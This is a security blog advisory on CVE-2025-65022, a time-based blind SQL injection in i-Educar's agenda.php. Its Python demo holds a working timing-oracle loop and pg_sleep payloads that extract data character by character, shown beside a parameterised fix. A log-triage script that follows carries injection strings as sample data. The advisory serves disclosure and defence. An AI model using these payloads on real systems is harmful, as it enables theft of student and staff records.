High-Severity SQL Injection Threatens i-Educar Users (CVE-2025-65022)

Overview

A high-severity vulnerability, identified as CVE-2025-65022, has been discovered in i-Educar, a popular free and open-source school management system. It is a time-based blind SQL injection affecting versions 2.10.0 and earlier. An attacker who holds valid user credentials can exploit the flaw to execute arbitrary SQL against the application database, potentially leading to a significant data breach or full system compromise. Immediate patching is strongly recommended.

Technical Details

The vulnerability resides in the ieducar/intranet/agenda.php script. The cod_agenda request parameter is concatenated directly into several SQL queries without validation or parameter binding, so an authenticated attacker can append arbitrary SQL to it. The injection is time-based (blind): rather than reading injected data back from the page, the attacker injects a conditional delay (a database sleep call that runs only when a guessed condition is true) and infers the answer from the response time. Repeating this one guess at a time is slow but sufficient to enumerate the database structure and extract its contents.
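To make the flaw concrete, the following added example (not i-Educar code, and not taken from the fix commit) reproduces the vulnerable concatenation pattern beside a hardened version and shows how a time-based blind probe extracts data one character at a time. It assumes a PostgreSQL-style backend with a pg_sleep() function; here pg_sleep() is emulated as a user-defined function on an in-memory SQLite table whose name, columns and rows are constructed for the demo.

```python
import re
import sqlite3
import time

# Added example, not i-Educar code. Stand-in for the agenda table that the
# vulnerable script queries; table name, columns and rows are constructed.
# pg_sleep() (PostgreSQL's delay function, assumed backend) is emulated as a
# SQLite user function so the timing oracle works offline.
DELAY = 0.05  # seconds the injected pg_sleep() call requests


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE agenda (cod_agenda INTEGER PRIMARY KEY, titulo TEXT)")
    conn.executemany("INSERT INTO agenda VALUES (?, ?)",
                     [(1, "Reuniao de pais"), (2, "Prova bimestral")])
    # pg_sleep(n) sleeps n seconds and returns 0, so the injected CASE below
    # never changes the result set; only the response time changes.
    conn.create_function("pg_sleep", 1, lambda s: time.sleep(s) or 0)
    return conn


def lookup_vulnerable(conn, cod_agenda):
    """The pattern the advisory describes: the request value spliced into SQL."""
    sql = "SELECT titulo FROM agenda WHERE cod_agenda = " + cod_agenda
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, cod_agenda):
    """Hardened form: allow-list the value as an integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]+", cod_agenda):
        raise ValueError("cod_agenda must be an integer id")
    return conn.execute("SELECT titulo FROM agenda WHERE cod_agenda = ?",
                        (int(cod_agenda),)).fetchall()


def timed(lookup, conn, value):
    """Run lookup(conn, value); return (rows, or None if rejected, elapsed seconds)."""
    start = time.perf_counter()
    try:
        rows = lookup(conn, value)
    except ValueError:
        rows = None
    return rows, time.perf_counter() - start


def delay_payload(position, guess):
    """Time-based blind probe: the database sleeps only if the guessed character matches."""
    return ("1 AND (SELECT CASE WHEN substr(titulo,%d,1)='%s' THEN pg_sleep(%s) "
            "ELSE 0 END FROM agenda WHERE cod_agenda = 1)" % (position, guess, DELAY))


def infer_char(conn, lookup, position, alphabet="ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
    """Recover one character of row 1's title purely from response timing.

    Returns None when no guess produces a measurable delay, which is what the
    hardened lookup yields because it rejects every payload before execution."""
    for guess in alphabet:
        _rows, elapsed = timed(lookup, conn, delay_payload(position, guess))
        if elapsed >= DELAY * 0.8:
            return guess
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", infer_char(db, lookup_vulnerable, 1))
    print("fixed:     ", infer_char(db, lookup_fixed, 1))
```

Run against the vulnerable lookup, the probe leaks the first letter of the title from timing alone even though every injected query returns zero rows and no error; the hardened lookup rejects the same payloads before they reach the database. Extended across positions and pointed at the catalog tables instead of one row, the same loop reads out the whole database, which is what the impact section below describes.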

CVSS Analysis

This vulnerability has been assigned a CVSS score of 7.2 (HIGH). The score reflects a large potential impact on the confidentiality and integrity of the database, tempered by the fact that exploitation requires an authenticated account; the published CVSS vector gives the individual metrics behind the score.

Possible Impact

Successful exploitation of this SQL injection vulnerability could have severe consequences:

  • Data Breach: Sensitive student, teacher, and administrative data could be exposed.
  • Data Manipulation: Attackers could modify or delete critical data, disrupting school operations.
  • Account Takeover: Attackers could gain control of administrator accounts, granting them complete control over the system.
  • System Compromise: In some configurations, the attacker might be able to leverage the SQL injection to gain code execution on the underlying server.

Mitigation and Patch Steps

The vulnerability has been patched in commit b473f92. To mitigate the risk, administrators are strongly advised to:

  1. Upgrade i-Educar: Upgrade immediately to a release that includes commit b473f92 (any version later than 2.10.0 that carries the fix).
  2. Review Code (If Necessary): If an immediate upgrade is not possible, review the fix in commit b473f92 and backport it to your installation. The standard remediation for this class of bug is to validate cod_agenda as an integer and pass it to the database as a bound query parameter rather than by string concatenation.
  3. Web Application Firewall (WAF): Implement or configure a WAF to block requests to agenda.php whose cod_agenda value is not a plain integer. A WAF reduces exposure but is not a replacement for patching the underlying vulnerability.
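For operators who cannot patch immediately, here is an added example (not part of the original post or of i-Educar) of the check a WAF rule or a log-triage script should apply: every cod_agenda value sent to agenda.php must be a plain integer, so anything else is an injection attempt worth investigating. The access-log lines are constructed for the demo, the deployment path is assumed to be /intranet/agenda.php, and the parser expects Apache/Nginx combined log format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: combined-format access log lines, two of which carry
# time-based injection payloads in cod_agenda. pg_sleep is PostgreSQL's delay
# function; the payload shapes are illustrative, not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2025:10:01:02 -0300] "GET /intranet/agenda.php?cod_agenda=17 HTTP/1.1" 200 4210
10.0.0.9 - - [12/Nov/2025:10:01:40 -0300] "GET /intranet/agenda.php?cod_agenda=17%20AND%20pg_sleep(5)-- HTTP/1.1" 200 3980
10.0.0.9 - - [12/Nov/2025:10:02:11 -0300] "GET /intranet/agenda.php?cod_agenda=17+AND+1=(SELECT+1+FROM+pg_sleep(5)) HTTP/1.1" 200 3980
10.0.0.7 - - [12/Nov/2025:10:03:00 -0300] "GET /intranet/index.php?cod_agenda=1%20OR%201=1 HTTP/1.1" 200 1200
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
AGENDA_PATH = "/intranet/agenda.php"  # assumed deployment path of the vulnerable script


def suspicious_cod_agenda(target):
    """Return the offending cod_agenda value for a request to agenda.php, else None.

    The only legitimate value is an integer id, so this is an allow-list check,
    not a signature list of SQL keywords that an attacker can obfuscate around."""
    parts = urlsplit(target)
    if not parts.path.endswith(AGENDA_PATH):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("cod_agenda", []):
        if not re.fullmatch(r"[0-9]+", value):
            return value  # already percent-decoded by parse_qs
    return None


def triage(log_text):
    """Return a list of (client ip, decoded cod_agenda value) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        value = suspicious_cod_agenda(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in triage(SAMPLE_LOG):
        print(ip, repr(value))
```

Two caveats when using this for detection. Access logs record only the query string, so the same parameter submitted in a POST body never appears here; a WAF rule has to apply the identical integer check to request bodies as well. And because time-based payloads produce normal 200 responses, there is no status code to alert on: the parameter value, and unusually long response times for agenda.php, are the only signals.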

Cybersecurity specialist and founder of Gowri Shankar Infosec - a professional blog dedicated to sharing actionable insights on cybersecurity, data protection, server administration, and compliance frameworks including SOC 2, PCI DSS, and GDPR.
